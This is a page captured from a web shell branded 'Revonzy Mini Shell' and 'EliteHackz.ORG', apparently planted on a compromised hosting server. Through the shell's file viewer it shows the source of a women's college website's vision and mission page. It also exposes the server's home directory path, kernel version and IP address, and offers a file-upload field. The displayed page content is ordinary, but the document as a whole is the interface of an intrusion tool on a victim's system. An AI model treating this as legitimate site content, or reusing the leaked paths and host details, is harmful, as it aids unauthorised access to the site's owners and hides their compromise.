Revonzy Mini Shell

Revonzy Mini Shell

Şuanki Dizin: /home/wwwdreamtechnolo/public_html/lbpmsolapur.org/
Dosya Yükle :
Şuanki Dosya : /home/wwwdreamtechnolo/public_html/lbpmsolapur.org/vision-mission.php

<?php
	require_once("admin/lib/functions.php");
	$db = new login_function();

	// $staff_details	=	$db->get_teaching_staff();
?>
<!DOCTYPE HTML>
<html>
<head>
<title></title>
<link href="css/style.css" rel="stylesheet" type="text/css" media="all" />


<link rel="stylesheet" type="text/css" href="css/stylesheet.css"/>
<script src="js/jquery-1.7.min.js"></script>
<script src="js/jquery.easing.1.3.js"></script>
<script src="js/tms-0.4.1.js"></script>
   
	<style>
	
	
.zoomin img 
{ 
margin-left:240px;
 height: 200px; width: 200px;
 -webkit-transition: all 2s ease; -moz-transition: all 2s ease;
 -ms-transition: all 2s ease; 
 transition: all 2s ease;
 }
.zoomin img:hover {
 width: 300px;
 height: 300px;
 }
 @-webkit-keyframes swinging{
    0%{-webkit-transform: rotate(10deg);}
    50%{-webkit-transform: rotate(-5deg)}
    100%{-webkit-transform: rotate(10deg);}
}
 
@keyframes swinging{
    0%{transform: rotate(10deg);}
    50%{transform: rotate(-5deg)}
    100%{transform: rotate(10deg);}
}
 
.swingimage{
    -webkit-transform-origin: 50% 0;
    transform-origin: 50% 0;
    -webkit-animation: swinging 3.5s ease-in-out forwards infinite;
    animation: swinging 3.5s ease-in-out forwards infinite;
}
.element {
  height:200px;
  width: 200px;
  margin: 0 auto;
 
  animation-name: stretch;
  animation-duration: 1.5s; 
  animation-timing-function: ease-out; 
  animation-delay: 0;
  animation-direction: alternate;
  animation-iteration-count: infinite;
  animation-fill-mode: none;
  animation-play-state: running;
}

@keyframes stretch {
  0% {
    transform: scale(.3);
    
    border-radius: 100%;
  }
  5% {
    
  }
  20% {
    transform: scale(1.5);
    
  }
}
</style>

</head>
<body>
	<?php
		require_once("lib/header.php");
	?>
	
	<style>
	#slideshow {
  margin: 80px auto;
  position: relative;
  width: 1080px;
  height: 440px;
  padding: 10px;
  box-shadow: 0 0 20px rgba(0, 0, 0, 0.4);
  margin:auto;
  z-index:0;
}

#slideshow > div {
  position: absolute;
  top: 10px;
  left: 10px;
  right: 10px;
  bottom: 10px;
  z-index:0;
}
.img_slide_n
{
	width:1080px;
	z-index:0;
}
.img_slide_n img{
	width:1080px;
	height:100%;
	z-index:0;
}
</style>
<script>
$("#slideshow > div:gt(0)").hide();

setInterval(function() {
  $('#slideshow > div:first')
    .fadeOut(1000)
    .next()
    .fadeIn(1000)
    .end()
    .appendTo('#slideshow');
}, 3000)
</script>

<div class="main_container" style="min-height:1400px;background-color:white;">
		<div class="page_highlighter" style="background-color:orange;">Vision / Mission :</div>	

			<?php
				require_once("highlights.php");
			?>

			<div class="data_container" style="margin-top:16px;">

			
					
				<div class="col_1_of_12 span_1_of_12">
			<div class="title-img"><span class="title-desc" style="color:black;border-bottom:0px;font-size:20px;color:white">Vision</span>
			<div class="clear"></div>
			</div>
			</div>
			 
				
			   <p id="mission" style="margin-left:0px; width:100%; font-style:normal !important; color:#333333; font-size:22px; font-weight:bold;">	
			   "Quality education to all especially rural, socially & economically deprived students to make them self-reliant 
    i.e., women empowerment through education."
				</p>
				
				
					<br /><br /><br /><br />
					
			<div class="col_1_of_12 span_1_of_12">
			<div class="title-img2"><span class="tiltle-desc" style="color:black;border-bottom:0px;font-size:20px;color:white">Mission</span>
			<div class="clear"></div>
			</div>
			</div>
				
				<p id="mission" style="margin-left:00px; width:100%; text-transform:Capitalize; font-family:none;  font-style:normal !important; font-size:22px; font-weight:bold;">
					"Women empowerment & excellence through quality education."
				</p>
				
				<br /><br /><br />
				
				<div class="" style="width:100%;">
			<div class="title-img2"><span class="tiltle-desc" style="color:black;border-bottom:0px;font-size:20px;color:white">Goals</span>
			<div class="clear"></div>
			</div>
			</div>
				
				<p id="mission" style="margin-left:0px;width:100%; font-style:normal !important; font-size:22px; font-weight:bold; line-height:25px;">
					
					<ul style="list-style-type: square; line-height:30px; font-weight:bold; font-size:22px; color:#333333; font-family: Montserrat Alternates">
					    <li>To inculcate each student to develop her full intellectual potential through a
focused academic experience with at least one self-employability skill.</li>
                        <li style="margin-top:15px;">To create an awareness of women's issues, human rights, social, legal and
environmental issues.</li>

    <li style="margin-top:15px;">To create a sense of national identity with respect and tolerance of all
cultures and religions.</li>
    <li style="margin-top:15px;">To groom the versatile personality of students with social and institutional
responsibility.</li>
    <li style="margin-top:15px;">Towards developing responsible women leaders for the future.</li>
    <li style="margin-top:15px;">To empower women through a pragmatic and mental development, towards
an idea of complete womanhood.</li>
					</ul>
					
					
				</p>	
				
				
				
			</div>
		</div>
		
		<?php
		require_once("lib/footer.php");
	?>
	    </body>
</html>

EliteHackz.ORG
Revonzy Mini Shell
root@revonzy.com

Linux 65-254-81-4.cprapid.com 5.14.0-284.11.1.el9_2.x86_64 #1 SMP PREEMPT_DYNAMIC Tue May 9 05:49:00 EDT 2023 x86_64
Apache
65.254.81.4